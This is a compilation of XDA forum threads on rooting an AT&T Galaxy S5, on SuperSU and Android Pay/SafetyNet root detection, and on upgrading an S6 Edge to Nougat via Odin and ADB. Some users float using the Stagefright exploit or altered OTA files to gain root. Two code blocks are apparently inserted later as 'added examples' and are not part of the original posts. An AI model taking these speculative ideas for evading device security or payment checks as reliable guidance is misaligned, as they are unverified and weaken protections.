Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
You know what? I think that I can get back into rooting if I complain about this s5 that's under warranty, and get a replacement that is on kitkat, and I can just work my way back up to an L based TouchWiz rom on the replacement.
My Knox is weird... it's like it wasn't baked in, and is only available for download on Google Play, and I have a few apps that are not visible on the Google Play store on other devices. Unless I'm losing my mind. I have Contra Evolution, which is Konami based, and if I search for it on the store it's gone, but it's still in my saved apps. I'm gonna feel really dumb if I'm rooted and don't know it.
ssn713 said:
I think you're substituting 1's (the number) where you should be putting l's (the letter).
Ohhhhhhhhhhhhh.....
Hold on.
Well, not having Knox "baked in" is a good thing. I'm sure there are ways to see if you are rooted. I think there is an app to check it.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Still getting a whole lot of nothing I guess...
adam_ky said:
Well, not having Knox "baked in" is a good thing. I'm sure there are ways to see if you are rooted. I think there is an app to check it.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Totally, I'm definitely not going to complain about it because those knox updates are annoying and almost intrusive to the experience. I have at least 20 root apps that I've paid for so I'm going to see what joeykrim has to say lol

Possible ways to achieve root?

So I actually don't have the S5, or any Samsung device for that matter, but a friend of mine does, and really wants to root their phone. I had no idea the AT&T S5 was so secure, but it's pretty interesting too. I've been researching for over 15 hours. I may not have been able to root his phone, but I think I have learned a couple things and maybe some possible root methods.
1.) Since using ODIN to downgrade would soft brick the phone, would it be possible to download the stock Lollipop update onto a computer, give the update super user access, replace the recovery with a custom one, or unlock the bootloader from the computer, then flash it through ODIN?
2.) Intercept any sort of OTA update, then alter it to flash a custom recovery or unlock bootloader? I don't know how you would go around this though.
3.) If someone hasn't taken the OTA update that patched the Stagefright exploit, could someone purposely use the exploit to allow installation of a custom recovery or even to unlock the bootloader since the Stagefright bug has super user access (or so I've heard).
Also, I'm sorry if these are stupid ideas. I know close to nothing about Samsung so everything I'm basing this off of is what I've read in the past 15 hours.
jsmithfms said:
So I actually don't have the S5, or any Samsung device for that matter, but a friend of mine does, and really wants to root their phone. I had no idea the AT&T S5 was so secure, but it's pretty interesting too. I've been researching for over 15 hours. I may not have been able to root his phone, but I think I have learned a couple things and maybe some possible root methods.
1.) Since using ODIN to downgrade would soft brick the phone, would it be possible to download the stock Lollipop update onto a computer, give the update super user access, replace the recovery with a custom one, or unlock the bootloader from the computer, then flash it through ODIN?
2.) Intercept any sort of OTA update, then alter it to flash a custom recovery or unlock bootloader? I don't know how you would go around this though.
3.) If someone hasn't taken the OTA update that patched the Stagefright exploit, could someone purposely use the exploit to allow installation of a custom recovery or even to unlock the bootloader since the Stagefright bug has super user access (or so I've heard).
Also, I'm sorry if these are stupid ideas. I know close to nothing about Samsung so everything I'm basing this off of is what I've read in the past 15 hours.
The issue is that AT&T (and Verizon) use an encrypted signature key to verify they are the correct unaltered files, as well as the means to unlock the bootloader to allow the OTA. Without that key, the tasks you mention are near impossible. They are not stupid ideas at all... just very difficult with all the security checks included.
KennyG123 said:
The issue is that AT&T (and Verizon) use an encrypted signature key to verify they are the correct unaltered files, as well as the means to unlock the bootloader to allow the OTA. Without that key, the tasks you mention are near impossible. They are not stupid ideas at all... just very difficult with all the security checks included.
Crap... well, does anyone know how that encryption key is generated? Like, could I theoretically get an algorithm from a ROM?
Honestly, for the time being I wouldn't bother with ROMs for that device and carrier, especially since it's someone else's device. Towelroot should be a good start. If I'm not mistaken, I don't think it's supposed to trip Knox.
Sent from my HTCEVODesign4G using XDA Free mobile app
jsmithfms said:
Crap... well, does anyone know how that encryption key is generated? Like, could I theoretically get an algorithm from a ROM?
This is the riddle of the Sphinx my friend. I am sure the super devs have tried their best so far to crack it. It has been an ongoing effort to make phones more and more secure, not against the amateur developers and rooters, but against the hackers. These smartphones are now our personal computers, diaries, personal assistants, financial operator, and more. They basically are a person's (and business's) life. AT&T and Verizon have taken the big steps to appeal to the Exchange clients, corporate, government and military contracts. Even the general public want to know their phone is secure. This is what keeps me stuck on the Sprint network.
Have you tried Kingroot?
I successfully rooted my wife's AT&T S4 on OC3 lollipop (supposedly unrootable) with the desktop version. Mobile version didn't work but desktop did without a hiccup. Maybe it'll work on the S5.
http://forum.xda-developers.com/android/apps-games/one-click-root-tool-android-2-x-5-0-t3107461
Rockin' a l337 with Goldeneye v49.1 + Wanam Xposed and loving life on AT&T's 4G LTE network
S5 on lollipop has a new nasty boot loader.... it was a miracle on its own that they ever came up with safestrap to duck the boot loader on earlier versions of android

SuperSU and SafetyNet / Android Pay

This is the place to discuss anything and everything related to SuperSU and SafetyNet / Android Pay.
To clarify, I am not currently actively doing any development on having SuperSU pass SafetyNet detection, or having Android Pay work; the same way I put no effort into beating other root detection methods such as various enterprise security tools.
In case any SuperSU-rooted device passes SafetyNet, that is a bug in SafetyNet, not a feature of SuperSU.
While I may not agree with Google's stance, I'm not about to go messing with payment systems. Is it possible though? Probably yes.
This thread has been created because you guys simply cannot stop talking about this, so these posts can now go here, where I don't ever have to see them.
Will v2.50 cause Android Pay not to work in 6.0? If so, I am guessing there is no way around it?
0.0 said:
Will v2.50 cause Android Pay not to work in 6.0? If so, I am guessing there is no way around it?
Root is a no no with android pay and I think custom ROMs are also out at the moment
Sent from my A0001 using Tapatalk
Pure Drive GT said:
Hey, thanks for your continued support for root on Android, was just wondering, is google making it harder to achieve decent root privileges, as in they don't want rooted devices or are they just unrelatedly changing up things which forces you guys to adapt?
On another note, is there any progress on root without the modded boot? This is by no means an ETA, just wanted to know if you think it's possible or the situation looks rather dire.
Thanks again for your many efforts!
Well, just look at Android Pay: it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards the same. It's not a bad thing per se, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
mdamaged said:
Well, just look at Android Pay: it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards the same. It's not a bad thing per se, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
Many banking and financial apps restrict access on rooted devices; it's not just Google.
It makes sense in some ways: root access allows running things in the background to either circumvent, monitor, or interrupt program transactions. They're being paranoid, and I don't blame them.
I don't like the Google Pay concept (or Apple's either); like every other encryption or security system, it's destined to eventually be hacked.
mdamaged said:
Well, just look at Android Pay: it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards the same. It's not a bad thing per se, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
Yep, I was able to add my debit card but not credit.
VZW LG G4
mdamaged said:
Well, just look at Android Pay: it will not allow one to add a credit card if it detects the device is rooted. So yeah, Google definitely wants to stop root, or at least make sure there is a strong dissuasion towards the same. It's not a bad thing per se, as Google is just making the devices more secure for the masses. We 'power users' are lucky to have those such as Chainfire working so hard to get us what they can.
http://www.androidpolice.com/2015/0...hy-android-pay-doesnt-support-rooted-devices/
shaggyskunk said:
Yet the Note 5 has been rooted for at least a couple of weeks
On Lollipop... And you also have to unlock your bootloader to do that, right? If yes, then you will trip KNOX, and that means you will lose some of your device functionality (Samsung Pay, for example), without the option to take it back. On the Nexus, on the other hand, when you want to use Android Pay, you can restore your phone to a completely stock condition, without any trace of previously used root.
Also, all of this is completely irrelevant to carrier-device users, since they have locked bootloaders.
Srandista said:
On Lollipop... And you also have to unlock your bootloader to do that, right? If yes, then you will trip KNOX, and that means you will lose some of your device functionality (Samsung Pay, for example), without the option to take it back. On the Nexus, on the other hand, when you want to use Android Pay, you can restore your phone to a completely stock condition, without any trace of previously used root.
Also, all of this is completely irrelevant to carrier-device users, since they have locked bootloaders.
I believe that it's only at&t and Verizon that locks the bootloader - And none in Canada and many other Countries.
Sent From my SM-N910W8 Running SlimRemix V5.1
Had an interesting event, on 2.52.
I unchecked "Enable Superuser" in Settings, to attempt to use Android Pay (Android Pay still wouldn't work). Then, when I rechecked "Enable Superuser", the re-installation of the binary failed, and I was prompted to reboot to try again. However, then I got a boot loop (never even got the opportunity to enter my encryption code). The only way I was able to boot was to re-flash the modified boot.img and re-install SuperSU from the zip (no idea whether both steps were necessary).
I have a Marshmallow Nexus 6, encrypted. For what it's worth, I was previously rooted on 5.1.1, and, after updating to 6.0 and until I re-rooted, I always got a "Your device is corrupt" message on startup, despite being all stock.
NYZack said:
Had an interesting event, on 2.52.
I unchecked "Enable Superuser" in Settings, to attempt to use Android Pay (Android Pay still wouldn't work). Then, when I rechecked "Enable Superuser", the re-installation of the binary failed, and I was prompted to reboot to try again. However, then I got a boot loop (never even got the opportunity to enter my encryption code). The only way I was able to boot was to re-flash the modified boot.img and re-install SuperSU from the zip (no idea whether both steps were necessary).
I have a Marshmallow Nexus 6, encrypted. For what it's worth, I was previously rooted on 5.1.1, and, after updating to 6.0 and until I re-rooted, I always got a "Your device is corrupt" message on startup, despite being all stock.
Root doesn't have to be enabled for pay to fail. Any time the system partition is modified pay will not work. There was an xda news article on it. A quick Google search involving Android pay and root should find it.
Lrs121 said:
Root doesn't have to be enabled for pay to fail. Any time the system partition is modified pay will not work. There was an xda news article on it. A quick Google search involving Android pay and root should find it.
I also found that having an unlocked bootloader will stop Pay working. When MM released I decided to go fully back to stock but kept the bootloader unlocked so I could flash MM. Pay still failed, so I've given up and gone rooted again.
Sent from my Nexus 6 using Tapatalk
Ch3vr0n said:
@Chainfire if you actually are able to pull off fully working stable root WITHOUT modifying the /system does that mean you MIGHT have opened the door into having root AND still being able to get OTA's?
osm0sis said:
Yup, all you'd need to do is reflash stock kernel to pass the boot partition EMMC check, or, we could automate restoring the previous stock kernel, flashing the OTA and then injecting the new stock kernel with root after flashing (à la AnyKernel2 or MultiROM). So many exciting possibilities there where custom recoveries are concerned.
Chainfire said:
Honestly it's not so different from using FlashFire to flash re-flash system, then OTA, then re-root. But it is easier, yes.
This is indeed exciting. However, I noticed that @Chainfire posted this downside on Google+:
Andrew Morykin 12:24
This should retain Android Pay, right?
Chainfire 12:58
+Andrew Morykin if it does, then it's by accident and not by design, and Android Pay will be updated to block it.
https://plus.google.com/+Chainfire/posts/aJbqUZ8PEP4
also, I was confused by this:
Chainfire said:
- I have not tested with encrypted devices
http://forum.xda-developers.com/showpost.php?p=63197935
Aren't
Nexus 6P / angler
angler-mdb08k-boot-systemless.zip
and
Nexus 5X / bullhead
bullhead-mdb08i-boot-systemless.zip
encrypted out of the box?
dabotsonline said:
This is indeed exciting. However, I noticed that @Chainfire posted this downside on Google+ :
How is that a downside?
It's exactly the same with every other form of root you will ever see. They don't want to support Android Pay (and some other stuff) on rooted devices. If we find a root that allows it, they will update their system to detect and block it. That cat and mouse game will not end as long as Google doesn't want Android Pay on rooted devices.
Maybe someone will make apps/modules that help circumvent this, but it certainly will not be me.
also, I was confused by this:
Aren't
Nexus 6P / angler
and
Nexus 5X / bullhead
encrypted out of the box?
Still can't test what I don't have.
russlowe73 said:
Factory images
So basically I have to go back to 100% stock using ADB, and then flash the new SuperSU stuff with any custom ROM? If so, what are the benefits of this other than getting Android Pay while rooted?
I'm not sure if anyone has specifically mentioned this, but Android Pay still works with this form of root on the Nexus 6!!
efrant said:
Starting with Android 5.0, OTA updates are now block-based rather than file-based, so any modification to the system partition will cause the OTA to fail, even mounting the system partition as r/w.
Just to add to this, it's a whole-partition /system patch OTA if the device launched with Lollipop or later, anything that launched with KitKat is still receiving the old file-based patch OTAs. Modifying Settings.apk would likely trip either method for a lot of OTAs though, since it's a pretty central component.
galaxyuserx said:
I use a Galaxy S6 G9200 HK with a kernel compiled by me, but I have a problem with root on 5.1.1 and I think in future on 6.0 too.
Is this root method integrated in the kernel source, or can I integrate my self-compiled kernel with those "boot.img systemless" images (repack boot.img with the kernel compiled by me)?
Is it possible for this new root method to work on Android 5.1.1?
I have a problem gaining root when I use the kernel compiled by me (the STOCK kernel has this problem too: BOOTLOOPs and FREEZEs on system boot) and I don't know how to solve it :/
I found on Chinese forums root integrated in boot.img; it works well and doesn't show "KERNEL is not SEandroid enforced", but when I try to integrate my kernel with this boot.img I get an error on system boot :/
Yup, it's all ramdisk changes so should be workable on any version of Android. Chainfire left instructions outlining the ramdisk changes in the WIP thread if you want to give it a try.
phishfi said:
I'm not sure if anyone has specifically mentioned this, but Android Pay still works with this form of root on the Nexus 6!!
Yup, seems to be the case with most banking and root-detecting apps... for now.
Can someone with the non-system SU use this app: https://play.google.com/store/apps/details?id=com.cigital.safetynetplayground and post the results?
This app is supposed to do the SafetyNet checks cleanly, the same way Android Pay does them.
Would be interesting to see if it succeeds on devices with this new supersu version.
secguy said:
Can someone with the non-system SU use this app: https://play.google.com/store/apps/details?id=com.cigital.safetynetplayground and post the results?
This app is supposed to do the SafetyNet checks cleanly, the same way Android Pay does them.
Would be interesting to see if it succeeds on devices with this new supersu version.
Just ran it and it passed.
Went ahead and installed su on a stock Nexus 5; so far working well. Android Pay does not work, but that was me being stupid and changing the hosts file and DPI before setting it up.
I do notice a little input lag after this, not enough to even make me consider removing root, but it is noticeable, anybody else with this?

Steps to Upgrade S6 Edge G925A (AT&T version) to Android 7.0 Nougat

I am a newbie and this is the first time I have tried anything out of the way to update my phone. I have an unlocked S6 edge AT&T version which was running MM 6.0.1. I wanted to update it to the latest Android Nougat and in order to do that I started searching online, but there was no such straight post or article where I can get everything in one place. I found a lot of information and many ways to upgrade the firmware but not all the steps were perfectly placed.
Anyway, I referred to many articles and posts and realized that it could be risky but doable, so I went ahead and did it successfully. Though I faced a few errors and issues, I found most of the resolutions here at xda-developers and other online forums. I am writing this post to help all S6 Edge owners who want to upgrade to Android 7.0.
My Phone Details:
Model: SM-G925A (S6 Edge AT&T)
Build: G925AUCS5DPJ1
Android: 6.0.1
There are two major steps involved to upgrade to the latest android version.
1. Flash the firmware with the higher security patch (keeping the device at Android 6) using ODIN software.
2. Upgrade the firmware to Android 7 using ADB software.
[Note: I might be using flash, upgrade interchangeably]
Downloads
Tools :
Latest ODIN tool (I used 3.10.6)
ADB tool (I used 25.0.3 but you can find latest version here)
Firmware:
First you need to flash your ROM to reach the G925AUCS5DPK5 build. You can download this file from here.
Refer to Post:
https://forum.xda-developers.com/att-galaxy-s6-edge/general/g925a-pk5-stock-repair-ota-7-0-t3564102
Then you have to update the firmware to get Android 7 using this file: SS-G925AUCS5DPK5-to-U5EQA8-UP (put a .zip after this file name to make it recognizable by the tool).
Step 01: Flash latest security patch
ODIN Working:
Link 01: http://droidvendor.com/how-to-install-stock-firmware-using-odin-on-a-samsung-device/
Link 02: http://www.droidviews.com/install-android-nougat-on-att-galaxy-s6-s6-edge-sm-g920ag925a/
My recommendations:
1. Use 3.10.6 version.
2. Unpack the G925AUCS5DPK5.zip file and you will find 4 different .tar.md5 files namely AP, BL, CP and CSC.
3. Use all 4 files at once in ODIN. Do not use only AP. If you use only AP file then your phone will be updated to the latest security patch and will work fine but it won't update the baseband version and will still show it as G925AUCS5DPJ1 even though your latest build is G925AUCS5DPK5. This will create problem while going to Android 7.0.
4. Take a proper backup of all your files before going ahead, using Samsung SmartSwitch (download links: Windows, Mac). This way you can take a backup easily, and your PC will also have the latest USB drivers.
5. Make sure your phone baseband and build are same as G925AUCS5DPJ1.
6. Charge your phone to at least 70% before going ahead. It is just a precaution in case this process takes longer than expected. (Mine finished in 4 minutes.)
Step 02: Update to Android 7.0
ADB Working:
Link 01: http://www.droidviews.com/download-latest-adb-and-fastboot-sdk-platform-tools-win-mac-linux/
Link 02: http://www.droidviews.com/install-apk-files-using-adb-commands/
My Recommendations:
1. Use the version I have recommended above instead of going to the latest version (I faced some issue with the latest one and had to go back to this version)
2. Instead of opening the command prompt from shift+right click, use Run or search for cmd and open it as administrator.
3. Change the SS-G925AUCS5DPK5-to-U5EQA8-UP.zip to OTA.zip or any shorter name. It will be easy to type the command.
4. If you face any error try using adb kill-server and then use adb sideload <ota.zip>.
5. Be patient this process will take some time. Mine took 25 minutes to complete.
6. Again keep your phone battery charged enough to survive the process.
7. After restart my phone stuck at black screen AT&T logo for 5 minutes. So don't get worried just wait, it will work.
8. Read all the instructions twice on the links provided before going ahead. If you are not sure of any instruction you can search xda forum and you will find relevant information.
Problems/Issues I faced
1. Reduced Storage: After updating my phone to build G925AUCS5DPK5, I realized the phone was only showing 16 GB of storage while my phone's internal storage was 64 GB. (I found the root cause when I got my 3rd error; I was not bothered enough by the storage issue and wanted to go ahead so that I could get Nougat soon.)
2. ADB Terminated: My phone got this error when I was updating it to Nougat. (The error looked like this: terminate called after throwing an instance of std::logic_error what().) I searched online and found out that this was happening because of the adb version I was using, so I downloaded another version and it went through without this error but gave me the one below.
3. Status 7 Error: Again in adb I faced this error, and it looked like this: 'Verifying current system... "/system/csc/contents.db" has unexpected contents.'
I searched online and found out that this could be related to the CSC file which I had not updated in my first step. So this time I again performed my first step using the Odin tool, but I selected the 3 files except the AP and ran the process. Yippee, I got my storage back, and in adb there was no error going forward.
Conclusion: I got Nougat on my AT&T S6 Edge but I faced a few issues. Being a newcomer, it was not very difficult provided you have the information and passion to do it. The steps mentioned here are very specific to the S6 Edge but they can be used for other versions as well. You only have to make sure you have the current files and build combination, otherwise your phone could be bricked. I hope this post will be helpful for the users.
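The build/baseband match that the post insists on (flashing only AP leaves the baseband at DPJ1 and the sideload then fails with status 7) can be checked before running `adb sideload`. This is an added POSIX sh preflight, not the poster's own script: it decodes the source build from the package name `SS-G925AUCS5DPK5-to-U5EQA8-UP.zip` and refuses to sideload unless both the build and the baseband equal it; reading those two values from the phone with `getprop` is noted as an assumption in the comments.

```shell
#!/bin/sh
# Added example: preflight for the Odin+ADB route described in the post above.
# The sideload package name encodes its source build: SS-<from>-to-<suffix>-UP.zip,
# e.g. SS-G925AUCS5DPK5-to-U5EQA8-UP.zip takes G925AUCS5DPK5 to G925AUCU5EQA8.
# Run the checks on the original file name before renaming it to OTA.zip.

# ota_from_build NAME -> prints the full source build id (empty if the name
# does not follow the SS-<from>-to-<to>-UP.zip pattern)
ota_from_build() {
  printf '%s\n' "$1" | sed -n 's/^SS-\([A-Z0-9]*\)-to-[A-Z0-9]*-UP\.zip$/\1/p'
}

# ota_to_build NAME -> prints the target build. The "to" part carries only the
# suffix after the model prefix (e.g. U5EQA8), so the prefix is borrowed from
# the source build: G925AUC + U5EQA8 = G925AUCU5EQA8.
ota_to_build() {
  from=$(ota_from_build "$1")
  to=$(printf '%s\n' "$1" | sed -n 's/^SS-[A-Z0-9]*-to-\([A-Z0-9]*\)-UP\.zip$/\1/p')
  [ -n "$from" ] && [ -n "$to" ] || return 1
  prefix_len=$(( ${#from} - ${#to} ))
  printf '%s%s\n' "$(printf '%s' "$from" | cut -c1-"$prefix_len")" "$to"
}

# preflight BUILD BASEBAND NAME -> prints "ok" or the reason to stop.
# Both the build and the baseband must equal the package's source build;
# the post's DPJ1 baseband under a DPK5 build is exactly the case this catches.
preflight() {
  build="$1"; baseband="$2"; ota="$3"
  from=$(ota_from_build "$ota")
  if [ -z "$from" ]; then echo "bad-package-name"; return 0; fi
  if [ "$build" != "$from" ]; then echo "build-mismatch:$build"; return 0; fi
  if [ "$baseband" != "$from" ]; then echo "baseband-mismatch:$baseband"; return 0; fi
  echo "ok"
}

# sideload_if_ok NAME -> reads the phone's values and sideloads only on "ok".
# Assumption: `gsm.version.baseband` is the standard baseband property, and on
# Samsung builds `ro.build.display.id` ends with the build tag; if your device
# reports them differently, pass the values from Settings > About device instead.
sideload_if_ok() {
  ota="$1"
  baseband=$(adb shell getprop gsm.version.baseband | tr -d '\r')
  build=$(adb shell getprop ro.build.display.id | tr -d '\r' | sed 's/.*\.//')
  verdict=$(preflight "$build" "$baseband" "$ota")
  if [ "$verdict" != "ok" ]; then
    echo "refusing to sideload: $verdict" >&2
    return 1
  fi
  cp "$ota" ./OTA.zip          # shorter name, as the post recommends
  adb kill-server
  adb sideload ./OTA.zip
}

# Constructed sample run (no phone needed): the post's file name against the
# good state and against the AP-only state it warns about.
SAMPLE_OTA='SS-G925AUCS5DPK5-to-U5EQA8-UP.zip'
echo "target build: $(ota_to_build "$SAMPLE_OTA")"
echo "DPK5/DPK5: $(preflight G925AUCS5DPK5 G925AUCS5DPK5 "$SAMPLE_OTA")"
echo "DPK5/DPJ1: $(preflight G925AUCS5DPK5 G925AUCS5DPJ1 "$SAMPLE_OTA")"
```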
Thanks for the detailed instruction on how to upgrade. Very useful! I do have one question though. Does Samsung pay work after upgrading using the method stated above?
Thanks for the great step by step guide. The only amendments/extra things that might help a little more:
Step 1) I used ODIN v3.12 as described above. Loaded all 4 files, BL AP CP CSC
***Basic missing step in the guide was to use ODIN correctly, you need to put your phone into upload mode.***
***Basic step, to prepare to use adb you must enable USB debugging while you have the Step 1 complete before you start Step 2***
Step 2) I was getting the errors thrown with ADB terminated and did some research. You have to use v25.0.3 or else it throws the std::logic_error what() error. It was challenging to track down that version of the adb but I found it here: https://www.izzysoft.de/ftp/local/android/
***Basic Step, in order to use adb, you must put your phone in recovery mode*** (and be sure you use v25.0.3)
Thanks again for the great tutorial!
Shame you cannot start out with the latest Baseband version (G925AUCS6DQC1) that is in the phone and not have to go back a version first to PK5.
techwire said:
1. Use the version I have recommended above instead of going to the latest version (I faced some issue with the latest one and had to go back to this version)
I am curious, what specific issues did you have? Should I stay on EQA8?
I had success with this method following the instructions and commentary going from DPK5 > EQA8. One additional thing to note is that each step of the process (Odin, adb) will wipe the contents of the phone. I backed up with Samsung Switch, but it doesn't quite capture all the settings so you may want to use something else.
Hi,
Great post, I followed your instructions and I was able to get from DPK1 (6.01) to QA8. Now I noticed that G625AUCU5EQA8 is not the official ROM, so I would like to get at least to G925AAUCS6DQC1.
Do you know how to get from G625AUCU5EQA8 to G925AAUCS6DQC1?
Thank you for your advice.
Here is another DPK5 mirror:
https://ulozto.net/!PpQ4SbJJOQyD/g925aucs5dpk5-6-0-1-4file-usa-att-7z
G925Aucu4dph5 is my build number, what can I do?
GoRi7o3 said:
G925Aucu4dph5 is my build number, what can I do?
You can Odin to Nougat 7.0 from here: http://forum.xda-developers.com/showthread.php?p=72406969
On Edge of Galaxy
Do you have any tutorial video of this or something that proves this method?
GoRi7o3 said:
Do you have any tutorial video of this or something that proves this method?
What proof do you need?
I don't know much about this. Can I jump from my baseband number g925aucu4dph5 to the baseband you mention in the post, or do I have to do this method many times, jumping from baseband to baseband to get to the one you posted?
GoRi7o3 said:
I don't know much about this. Can I jump from my baseband number g925aucu4dph5 to the baseband you mention in the post, or do I have to do this method many times, jumping from baseband to baseband to get to the one you posted?
Yes. You can jump from whatever baseband you have to most full Odin files.
On Edge of Galaxy
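The questions above about jumping from one baseband (build) to another, and about not being able to go back from DQC1 to PK5, come down to what the build string encodes. As an added example, not code from any post in this thread or from Samsung or Odin, here is a small Python decoder that splits a build ID such as G925AUCS6DQC1 into its fields and states whether an Odin flash from the phone's current build to a target file would be a bootloader downgrade. The field layout, the year letters (O=2015, P=2016, Q=2017) and the month letters are the commonly documented Samsung convention and are treated here as assumptions; the OS letter is reported raw because its meaning differs per model.

```python
"""Decode Samsung firmware build IDs and classify an Odin flash between two of them.

Added example for this thread; not code from any post, from Samsung, or from Odin.
Assumed field layout (commonly documented convention, not taken from the thread):
    <model><region><U|S><bootloader rev><OS letter><year letter><month letter><release>
    e.g. G925AUCS6DQC1 -> G925A, UC, S, 6, D, Q (2017), C (March), 1
"""
import re
from dataclasses import dataclass

BUILD_RE = re.compile(
    r"^(?P<model>[A-Z]\d{3,4}[A-Z]{0,2})"  # G925A, G930F, G9300 ...
    r"(?P<region>[A-Z]{2})"                # UC (AT&T), XX (international) ...
    r"(?P<kind>[US])"                      # U = regular, S = security build (assumed)
    r"(?P<bootloader>\d)"                  # rollback counter checked before flashing
    r"(?P<os>[A-Z])"                       # per-model OS generation letter
    r"(?P<year>[A-Z])"                     # assumed: A=2001 ... O=2015, P=2016, Q=2017
    r"(?P<month>[A-Z])"                    # A=January ... L=December
    r"(?P<release>[A-Z0-9])$"
)


@dataclass(frozen=True)
class Build:
    model: str
    region: str
    kind: str
    bootloader: int
    os: str
    year: int
    month: int
    release: str
    raw: str


def parse_build(build_id: str) -> Build:
    """Split a build ID into fields; case-insensitive, raises ValueError on garbage."""
    m = BUILD_RE.match(build_id.strip().upper())
    if not m:
        raise ValueError(f"not a Samsung build ID: {build_id!r}")
    return Build(
        model=m["model"], region=m["region"], kind=m["kind"],
        bootloader=int(m["bootloader"]), os=m["os"],
        year=2001 + ord(m["year"]) - ord("A"),  # assumed year-letter mapping
        month=ord(m["month"]) - ord("A") + 1,   # A=1 ... L=12
        release=m["release"], raw=m.string,
    )


def flash_verdict(current_id: str, target_id: str) -> str:
    """Classify an Odin flash from the build on the phone to the firmware file.

    Only the bootloader revision is used for the go/no-go decision: Samsung's
    bootloader refuses to accept an image whose revision is lower than the one
    already fused in, which is why DQC1 (rev 6) cannot go back to PK5 (rev 5).
    A full Odin flash also wipes user data, so the 'ok' verdict says so.
    """
    cur, tgt = parse_build(current_id), parse_build(target_id)
    if (cur.model, cur.region) != (tgt.model, tgt.region):
        return (f"refuse: {tgt.raw} is for {tgt.model}/{tgt.region}, "
                f"phone is {cur.model}/{cur.region}")
    if tgt.bootloader < cur.bootloader:
        return (f"blocked: bootloader rev {tgt.bootloader} < {cur.bootloader}; "
                "rollback protection will reject the flash")
    return (f"ok: direct flash {cur.raw} -> {tgt.raw} "
            f"(bootloader {cur.bootloader} -> {tgt.bootloader}); expect a data wipe")


if __name__ == "__main__":
    # Build IDs quoted in this thread (constructed pairs, for illustration)
    for cur, tgt in [("G925AUCU4DPH5", "G925AUCU5EQA8"),
                     ("G925AUCS6DQC1", "G925AUCS5DPK5"),
                     ("G925AUCS6DQC1", "G900AUCS5DPK5")]:
        print(flash_verdict(cur, tgt))
```

The regex is anchored at both ends, so the fixed-width tail (kind, bootloader, OS, year, month, release) is taken from the right and the model/region split resolves by backtracking; that is what lets the same pattern handle G925A+UC and G930F+XX.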
Ok, thank you, I will use this method soon; I hope it works.
I am still rooted with OE2 5.0.1
Is there any way to update my device using ODIN without losing root? Just curious. I'm switching to Fi and I unlocked my phone from the carrier, but since it's 5.0.1 it won't run the Project Fi app, which requires 5.1+ to activate and operate.
Illiteracy and instruction...
I would like to know why it seems like the only threads on how to upgrade a SM-G925A from 5.1.1 to Nougat lack clear language, in an organized fashion, that would allow those most challenged by the process to accomplish the task with the least amount of frustration. I really cannot comprehend how it is that someone considered a "Senior Member" is permitted to instruct on complex procedures, when it is apparent the person does not have a fluency in the language being used. I don't say this as an insult to anyone's culture or ethnicity, it just adds to the difficulty. Where are the moderators (Admins) when you need clarity? There must be someone who can impart the step-by-step procedure concisely. This forum is not useful for its intended purpose otherwise.
Alias_REBaker said:
I would like to know why it seems like the only threads on how to upgrade a SM-G925A from 5.1.1 to Nougat lack clear language, in an organized fashion, that would allow those most challenged by the process to accomplish the task with the least amount of frustration. I really cannot comprehend how it is that someone considered a "Senior Member" is permitted to instruct on complex procedures, when it is apparent the person does not have a fluency in the language being used. I don't say this as an insult to anyone's culture or ethnicity, it just adds to the difficulty. Where are the moderators (Admins) when you need clarity? There must be someone who can impart the step-by-step procedure concisely. This forum is not useful for its intended purpose otherwise.
What are you talking about? This is a very easy process. But there is an even easier one if you read other threads and learn from XDA or YouTube how to use ODIN. When you are ready to try Odin you can flash firmware from here: http://forum.xda-developers.com/showthread.php?t=3611271 . This is 100% stock AT&T Nougat 7.0 Odin firmware used by Best Buy or Samsung to restore phones.
BTW, Senior Members are mostly the ones who built this forum. So just follow the instructions, sit back and enjoy. If you need more clarification use your best friend Google or YouTube.
On Edge of Galaxy
Clarity wins
First of all, not admitting your English grammar is in need of some fine tuning doesn't help to clarify the issue. Additionally, combining both ADB sideloading and Odin, without clearly delineating which zip files need to be acquired for accomplishing the task using one or the other method, just adds to the confusion. I upgraded my phone using Odin and the "OCF" "tar" files. But, I was getting confused as to whether I also needed to use ADB to get to "OCF". I started off at "BOJ9". Not wanting to brick my phone led to much trepidation. I wanted to be absolutely sure. The main question I needed clarified was whether I could go from "BOJ9" to "OCF" without needing to go through each iteration. Many people had asked this question, but no specific answer was ever given. Thus, my frustration. I did eventually figure it out, but coming to XDA looking for a clear answer was not the solution. I see a lot of posturing, responders getting snarky telling the confused it's in some thread yet to be dug into or just being rude. Just help. Really, if that's not why you're here, move on.
Alias_REBaker said:
First of all, not admitting your English grammar is in need of some fine tuning doesn't help to clarify the issue. Additionally, combining both ADB sideloading and Odin, without clearly delineating which zip files need to be acquired for accomplishing the task using one or the other method, just adds to the confusion. I upgraded my phone using Odin and the "OCF" "tar" files. But, I was getting confused as to whether I also needed to use ADB to get to "OCF". I started off at "BOJ9". Not wanting to brick my phone led to much trepidation. I wanted to be absolutely sure. The main question I needed clarified was whether I could go from "BOJ9" to "OCF" without needing to go through each iteration. Many people had asked this question, but no specific answer was ever given. Thus, my frustration. I did eventually figure it out, but coming to XDA looking for a clear answer was not the solution. I see a lot of posturing, responders getting snarky telling the confused it's in some thread yet to be dug into or just being rude. Just help. Really, if that's not why you're here, move on.
First of all, English is my sixth language; I know 5 more, how many more do you know? Second, this is an international forum open to the whole world. Third, I'm almost 55 years old and understand the whole process (this tells me one or two things about you). You must be a millennial who thinks he is the most important person in the world. If you don't like it, move on to a different place.
And yes, you can go straight by ODIN from your build to QCF without any problem, but it seems like you did not read enough.
Oh! One more thing: you must be Polish, because only these people critique other people's language ability; I know because I was like this once.
Edit: Also I see an inability to follow instructions or search. You need to have everything put on a silver platter for you.
On Edge of Galaxy
Attitude instead of resolution.
